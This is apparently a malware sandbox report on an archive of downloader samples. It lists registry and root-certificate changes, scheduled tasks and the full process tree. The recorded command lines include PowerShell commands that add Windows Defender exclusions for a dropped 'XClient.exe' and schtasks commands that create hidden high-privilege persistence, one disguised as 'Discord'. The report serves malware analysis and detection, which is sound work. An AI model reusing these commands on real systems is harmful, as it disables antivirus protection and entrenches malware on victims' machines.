| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bundle.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = [certificate blob omitted] | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] | C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = [certificate blob omitted] | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob data omitted) | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = (blob data omitted) | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = (blob data omitted) | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bundle.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\" -spe -an -ai#7zMap32033:140:7zEvent31558
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\" -spe -an -ai#7zMap21426:192:7zEvent28676
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1422648120142377316586014131649600467-343676124-14957699643082436722037865802"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.0.1807589521\1161241514" -parentBuildID 20221007134813 -prefsHandle 1248 -prefMapHandle 1240 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {540087b3-7ccf-4d1c-a059-e41819ebe74d} 952 "\\.\pipe\gecko-crash-server-pipe.952" 1340 feef158 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.1.871890360\700763944" -parentBuildID 20221007134813 -prefsHandle 1528 -prefMapHandle 1524 -prefsLen 20928 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {766ea588-348d-4b6c-a457-c5ec797b63f1} 952 "\\.\pipe\gecko-crash-server-pipe.952" 1540 d70758 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.2.868826732\2005783715" -childID 1 -isForBrowser -prefsHandle 2040 -prefMapHandle 2036 -prefsLen 20966 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2224044-e215-4976-b198-4ace77dca3b6} 952 "\\.\pipe\gecko-crash-server-pipe.952" 2056 fe69658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.3.1105638676\2074281319" -childID 2 -isForBrowser -prefsHandle 2636 -prefMapHandle 2632 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4508e40-a4bd-4769-9f2d-64487a579ae8} 952 "\\.\pipe\gecko-crash-server-pipe.952" 2648 1c109358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.4.387133533\1534764246" -childID 3 -isForBrowser -prefsHandle 2940 -prefMapHandle 2936 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6edf259-cfdb-4a75-b404-1bfd76cfd49d} 952 "\\.\pipe\gecko-crash-server-pipe.952" 2952 1d076958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.5.129225872\1689351649" -childID 4 -isForBrowser -prefsHandle 3860 -prefMapHandle 3856 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d750917-b068-41ce-a483-a1bad25e3e35} 952 "\\.\pipe\gecko-crash-server-pipe.952" 3872 1f46cb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.6.1804687658\1562654489" -childID 5 -isForBrowser -prefsHandle 3988 -prefMapHandle 3992 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1719c10-862e-418c-b010-03b38e6c2085} 952 "\\.\pipe\gecko-crash-server-pipe.952" 3980 1f46ef58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.7.1811302836\1184689125" -childID 6 -isForBrowser -prefsHandle 4180 -prefMapHandle 4184 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8da1466b-11c7-4c56-a51b-c8878f177343} 952 "\\.\pipe\gecko-crash-server-pipe.952" 4172 1f46da58 tab
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pered.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pered.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pered.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pered.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.8.1126244122\2038192603" -childID 7 -isForBrowser -prefsHandle 4464 -prefMapHandle 4460 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ebf790a-5af9-46a4-bcba-d0db0725e0e1} 952 "\\.\pipe\gecko-crash-server-pipe.952" 4476 23ad0558 tab
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\getlab.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\getlab.exe"
C:\Users\Admin\AppData\Local\Temp\is-H4VJ0.tmp\getlab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H4VJ0.tmp\getlab.tmp" /SL5="$50216,3315090,56832,C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\getlab.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
"C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe" -i
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\System32\drivers\etc\hosts
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.9.1446847228\588130600" -childID 8 -isForBrowser -prefsHandle 3960 -prefMapHandle 3948 -prefsLen 26796 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2de5566e-3540-4764-8c18-ad40747c0ec1} 952 "\\.\pipe\gecko-crash-server-pipe.952" 3956 1b895358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.10.1884463544\2018580230" -childID 9 -isForBrowser -prefsHandle 1108 -prefMapHandle 3948 -prefsLen 26796 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7c33bc4-ea3d-432c-b08d-eed29796003a} 952 "\\.\pipe\gecko-crash-server-pipe.952" 1116 1c028758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.11.2078662493\417643880" -childID 10 -isForBrowser -prefsHandle 2372 -prefMapHandle 1108 -prefsLen 26796 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f449bd98-e6f6-4959-89de-d08bab356845} 952 "\\.\pipe\gecko-crash-server-pipe.952" 2160 1fd0df58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.12.1547294523\49168901" -childID 11 -isForBrowser -prefsHandle 1108 -prefMapHandle 2372 -prefsLen 26796 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ce6c281-65d6-4513-b8ab-8d63fd131a20} 952 "\\.\pipe\gecko-crash-server-pipe.952" 4660 23a74e58 tab
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n /f "C:\Users\Admin\Desktop\RedoClear.dot"
C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\Desktop\ExitPublish.pptm"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RequestSearch.bat
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-799836794608972468-19476862801382848759-2038008279-7848065921347270234-824849411"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pjxho1wlkp.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pjxho1wlkp.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pjxho1wlkp.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pjxho1wlkp.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\m.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\m.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\8fc809.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\8fc809.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\calendar.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\calendar.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bp.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bp.exe"
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\T3.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\T3.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\winbox.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\winbox.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bundle.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bundle.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\fkydjyhjadg.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\fkydjyhjadg.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe'
C:\Users\Admin\AppData\Local\Temp\143025086.exe
C:\Users\Admin\AppData\Local\Temp\143025086.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\o.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\o.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hbrq7ikJ2HdF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\RuntimeBroker.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\RuntimeBroker.exe"
C:\Windows\system32\schtasks.exe
